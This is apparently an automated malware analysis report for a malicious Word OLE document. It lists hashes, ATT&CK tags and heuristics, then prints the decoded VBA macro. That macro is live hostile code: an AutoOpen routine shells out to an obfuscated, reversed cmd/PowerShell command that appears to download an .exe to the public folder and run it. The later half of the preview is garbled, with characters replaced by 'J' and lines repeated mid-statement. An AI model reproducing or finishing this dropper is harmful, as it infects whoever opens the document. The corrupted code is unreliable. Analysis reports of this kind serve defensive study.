Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ff6863ee8e1039eb…

MALICIOUS

Office (OLE)

60.7 KB First seen: 2019-03-18
MD5: 7c3e0d6604be6fc4a5ba6ba236a0ddb0 SHA-1: 23076784784917e22aff8d160fa9aaa20d0a69f2 SHA-256: ff6863ee8e1039eb978f81560bf85e26066269e0fcdb2978333eb71945e9d474
122 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE document containing a legacy WordBasic AutoOpen macro. This macro is designed to execute a command upon opening, indicated by the 'Shell@' call. The obfuscated nature of the script prevents a full analysis of the executed command, but the presence of the AutoOpen marker and the legacy macro type strongly suggests malicious intent, likely to download and execute a secondary payload.

Heuristics 5

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 62,175 bytes but its declared streams total only 36,545 bytes — 25,630 bytes (41%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5783 bytes
SHA-256: cd39cac4cff63e774f15e25b262526dfaedad972c50c2d5668683cd5e09fe3bc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "OkVlhQFqzKskz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const pRsVFWlF = 0
   Dim JDjawZ(4)
JDjawZ(0) = Left(lLzRTvTJ, 277)
JDjawZ(1) = Left(lLzRTvTJ, 277)
JDjawZ(2) = Left(lLzRTvTJ, 277)
JDjawZ(3) = Mid(NcQCwcS, 322, 870)
   Dim WzBjbI(3)
WzBjbI(0) = Right(cPtfRz, 591)
WzBjbI(1) = Left(lLzRTvTJ, 277)
WzBjbI(2) = MidB(PLmGaNfW, 353, 844)
   Dim mdaHii(3)
mdaHii(0) = Left(lLzRTvTJ, 277)
mdaHii(1) = Mid(NcQCwcS, 322, 870)
mdaHii(2) = Right(cPtfRz, 591)
   Dim kdjvzK(2)
kdjvzK(0) = Left(lLzRTvTJ, 277)
kdjvzK(1) = Right(cPtfRz, 591)
   Dim OhWfv(3)
OhWfv(0) = Left(lLzRTvTJ, 277)
OhWfv(1) = Mid(NcQCwcS, 322, 870)
OhWfv(2) = Mid(NcQCwcS, 322, 870)
Shell@ kMPhW + ZUjQOrtsonbaBq + JiOwdEWnRV, CInt(pRsVFWlF)
   Dim MjJMX(5)
MjJMX(0) = Right(cPtfRz, 591)
MjJMX(1) = Right(cPtfRz, 591)
MjJMX(2) = MidB(PLmGaNfW, 353, 844)
MjJMX(3) = Right(cPtfRz, 591)
MjJMX(4) = Left(lLzRTvTJ, 277)
   Dim vGhsk(2)
vGhsk(0) = Left(lLzRTvTJ, 277)
vGhsk(1) = MidB(PLmGaNfW, 353, 844)
   Dim qUudwf(3)
qUudwf(0) = Right(cPtfRz, 591)
qUudwf(1) = Mid(NcQCwcS, 322, 870)
qUudwf(2) = Mid(NcQCwcS, 322, 870)
End Sub


Attribute VB_Name = "WQujRVwwzsiSCT"
Function kMPhW()
Dim JUioOY(4)
JUioOY(0) = Left(lLzRTvTJ, 277)
JUioOY(1) = Mid(NcQCwcS, 322, 870)
JUioOY(2) = Right(cPtfRz, 591)
JUioOY(3) = MidB(PLmGaNfW, 353, 844)
   Dim qLTflQ(2)
qLTflQ(0) = Right(cPtfRz, 591)
qLTflQ(1) = Mid(NcQCwcS, 322, 870)
   Dim jRWJV(2)
jRWJV(0) = MidB(PLmGaNfW, 353, 844)
jRWJV(1) = Mid(NcQCwcS, 322, 870)
   Dim GimiYJ(3)
GimiYJ(0) = MidB(PLmGaNfW, 353, 844)
GimiYJ(1) = Left(lLzRTvTJ, 277)
GimiYJ(2) = Right(cPtfRz, 591)
jKDrjwGYzX = Format(Chr(4 + 13 + 17 + 11 + 54)) + "md /V^:^O" + "/" + Format(Chr(3 + 9 + 11 + 8 + 36)) + Format(Chr(1 + 4 + 5 + 3 + 21)) + "^s^et ^s^W=^  ^  ^ ^    ^ ^" + "      ^ ^}^" + "}^{h" + Format(Chr(4 + 13 + 17 + 11 + 54)) + "t^" + "a" + Format(Chr(4 + 13 + 17 + 11 + 54)) + "}^;k^a^er^b;^Oi^L^$ m^e" + "^tI^-^e^k^ov" + "nI;)^O^i^L$ ,^OHV$(^el^i"
Dim LVmznJ(4)
LVmznJ(0) = Right(cPtfRz, 591)
LVmznJ(1) = MidB(PLmGaNfW, 353, 844)
LVmznJ(2) = MidB(PLmGaNfW, 353, 844)
LVmznJ(3) = MidB(PLmGaNfW, 353, 844)
   Dim Wpfzuf(3)
Wpfzuf(0) = Left(lLzRTvTJ, 277)
Wpfzuf(1) = Mid(NcQCwcS, 322, 870)
Wpfzuf(2) = Left(lLzRTvTJ, 277)
XSzvfEYWz = "^F^dao^lnw^oD^" + ".Rdp^${yr^t^{" + ")r^wE$ n^i^ OHV$(h" + Format(Chr(4 + 13 + 17 + 11 + 54)) + "^a^ero^f;" + "^'^exe.'^+EEM$+'" + "\'+" + Format(Chr(4 + 13 + 17 + 11 + 54)) + "^i^l" + "^bup:vn^e$^=" + "^O^iL$"
Dim MzJGLR(4)
MzJGLR(0) = Left(lLzRTvTJ, 277)
MzJGLR(1) = Mid(NcQCwcS, 322, 870)
MzJGLR(2) = Right(cPtfRz, 591)
MzJGLR(3) = Left(lLzRTvTJ, 277)
   LmGaNfW, 353, 844)
LVmznJ(2) = MJJJdB(PLmGaNfW, J53, 844)
LVmJJJ(3) = MidB(PJJGaNfW, 353, 8J4)
   Dim WpJJuf(3)
WpfzufJJ) = Left(lLzRJvTJ, 277)
WpJJuf(1) = Mid(NJJCwcS, 322, 87J)
Wpfzuf(2) JJLeft(lLzRTvTJJJ277)
XSzvfEYJz = "^F^dao^lJJ^oD^" + ".RdpJJ{yr^t^{" + ")J^wE$ n^i^ OHVJJh" + Format(CJJ(4 + 13 + 17 J 11 + 54)) + JJa^ero^f;" + "JJ^exe.'^+EEM$+J" + "\'+" + FJJmat(Chr(4 + 1JJ+ 17 + 11 + 5J)) + "^i^l" +JJ^bup:vn^e$^="JJ "^O^iL$"
DiJ MzJGLR(4)
MJJGLR(0) = LeftJJLzRTvTJ, 277)J
MzJGLR(1) = JJd(NcQCwcS, 32JJ 870)
MzJGLRJ LVmznJ(4)
LJJznJ(0) = RighJJcPtfRz, 591)
JLVmznJ(1) = MJJB(PLmGaNfW, 3JJ, 844)
LVmznJ(2) = MidB(PLJJaNfW, 353, 84JJ
LVmznJ(3) =JMidB(PLmGaNfWJJ353, 844)
  JJim Wpfzuf(3)
JWpfzuf(0) = LJJt(lLzRTvTJ, 2JJ)
Wpfzuf(1) J Mid(NcQCwcS,JJ22, 870)
WpfJJf(2) = Left(lJzRTvTJ, 277)
JJSzvfEYWz = "^JJdao^lnw^oD^" J ".Rdp^${yr^tJJ" + ")r^wE$ nJJ^ OHV$(h" + FJrmat(Chr(4 + JJ + 17 + 11 + JJ)) + "^a^ero^J;" + "^'^exe.JJ+EEM$+'" + "\JJ" + Format(ChJ(4 + 13 + 17 JJ11 + 54)) + "JJ^l" + "^bup:vJ^e$^=" + "^O^JJ$"
Dim MzJGLJJ4)
MzJGLR(0)J= Left(lLzRTvJJ, 277)
MzJGLJJ1) = Mid(NcQCJcS, 322, 870)JJMzJGLR(2) = RJJht(cPtfRz, 59J)
MzJGLR(3) JJLeft(lLzRTvTJJJ277)
   LmGaJfW, 35
... (truncated)